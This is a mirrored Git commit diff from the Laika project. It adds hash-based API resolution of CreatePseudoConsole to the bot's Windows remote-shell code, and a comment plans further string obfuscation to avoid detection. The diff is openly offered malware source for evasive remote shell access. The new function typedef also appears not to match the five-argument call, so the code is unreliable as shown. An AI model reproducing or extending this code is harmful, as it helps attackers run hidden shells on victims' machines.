1
0
mirror of https://github.com/CPunch/Laika.git synced 2024-11-24 13:31:05 +00:00

Bot: Added oCreatePseudoConsole to laikaO_init()

This commit is contained in:
CPunch 2022-07-08 12:54:14 -05:00
parent f92bbbc85b
commit 35cbd91dd1
3 changed files with 19 additions and 5 deletions

View File

@ -4,12 +4,15 @@
#include "laika.h" #include "laika.h"
#ifdef _WIN32 #ifdef _WIN32
# include <process.h>
# include <windows.h> # include <windows.h>
/* WINAPI types */ /* WINAPI types */
typedef HINSTANCE(WINAPI *_ShellExecuteA)(HWND, LPCSTR, LPCSTR, LPCSTR, LPCSTR, INT); typedef HINSTANCE(WINAPI *_ShellExecuteA)(HWND, LPCSTR, LPCSTR, LPCSTR, LPCSTR, INT);
typedef HRESULT(WINAPI *_CreatePseudoConsole)(COORD, HANDLE, HANDLE, HPCON *);
extern _ShellExecuteA oShellExecuteA; extern _ShellExecuteA oShellExecuteA;
extern _CreatePseudoConsole oCreatePseudoConsole;
#endif #endif
void laikaO_init(); void laikaO_init();

View File

@ -129,15 +129,25 @@ _findByHashFail:
/* ======================================[[ Exposed API ]]====================================== */ /* ======================================[[ Exposed API ]]====================================== */
_ShellExecuteA oShellExecuteA; _ShellExecuteA oShellExecuteA;
_CreatePseudoConsole oCreatePseudoConsole;
void laikaO_init() void laikaO_init()
{ {
uint32_t hash; uint32_t hash;
/* TODO: these library strings should probably be obfuscated (by a skid box maybe?) */ /* TODO: these library strings should probably be obfuscated (by a skid box maybe?) */
oShellExecuteA = findByHash("shell32.dll", 0x89858cd3); oShellExecuteA = (_ShellExecuteA)findByHash("shell32.dll", 0x89858cd3);
oCreatePseudoConsole = (_CreatePseudoConsole)findByHash("kernel32.dll", 0x7310ef7);
hash = getHashName("ShellExecuteA"); /* 0x89858cd3 */ /*
printf("ShellExecuteA: real is %p, hashed is %p. [HASH: %x]\n", (void *)ShellExecuteA, hash = getHashName("CreateProcessA"); // 0x9e687c1d
findByHash("shell32.dll", hash), hash); printf("CreateProcessA: real is %p, hashed is %p. [HASH: %x]\n",
(void *)CreateProcessA,
findByHash("kernel32.dll", hash), hash);
hash = getHashName("InitializeProcThreadAttributeList");
printf("InitializeProcThreadAttributeList: real is %p, hashed is %p. [HASH: %x]\n",
(void *)InitializeProcThreadAttributeList,
findByHash("kernel32.dll", hash), hash);
*/
} }

View File

@ -1,5 +1,6 @@
/* platform specific code for opening shells (pseudo consoles) on windows */ /* platform specific code for opening shells (pseudo consoles) on windows */
#include "bot.h" #include "bot.h"
#include "obf.h"
#include "lerror.h" #include "lerror.h"
#include "lmem.h" #include "lmem.h"
#include "shell.h" #include "shell.h"
@ -128,7 +129,7 @@ HRESULT CreatePseudoConsoleAndPipes(HPCON *phPC, HANDLE *phPipeIn, HANDLE *phPip
return HRESULT_FROM_WIN32(GetLastError()); return HRESULT_FROM_WIN32(GetLastError());
/* create the pseudo console of the required size, attached to the PTY - end of the pipes */ /* create the pseudo console of the required size, attached to the PTY - end of the pipes */
hr = CreatePseudoConsole(consoleSize, hPipePTYIn, hPipePTYOut, 0, phPC); hr = oCreatePseudoConsole(consoleSize, hPipePTYIn, hPipePTYOut, 0, phPC);
/* we can close the handles to the PTY-end of the pipes here /* we can close the handles to the PTY-end of the pipes here
because the handles are dup'ed into the ConHost and will be released because the handles are dup'ed into the ConHost and will be released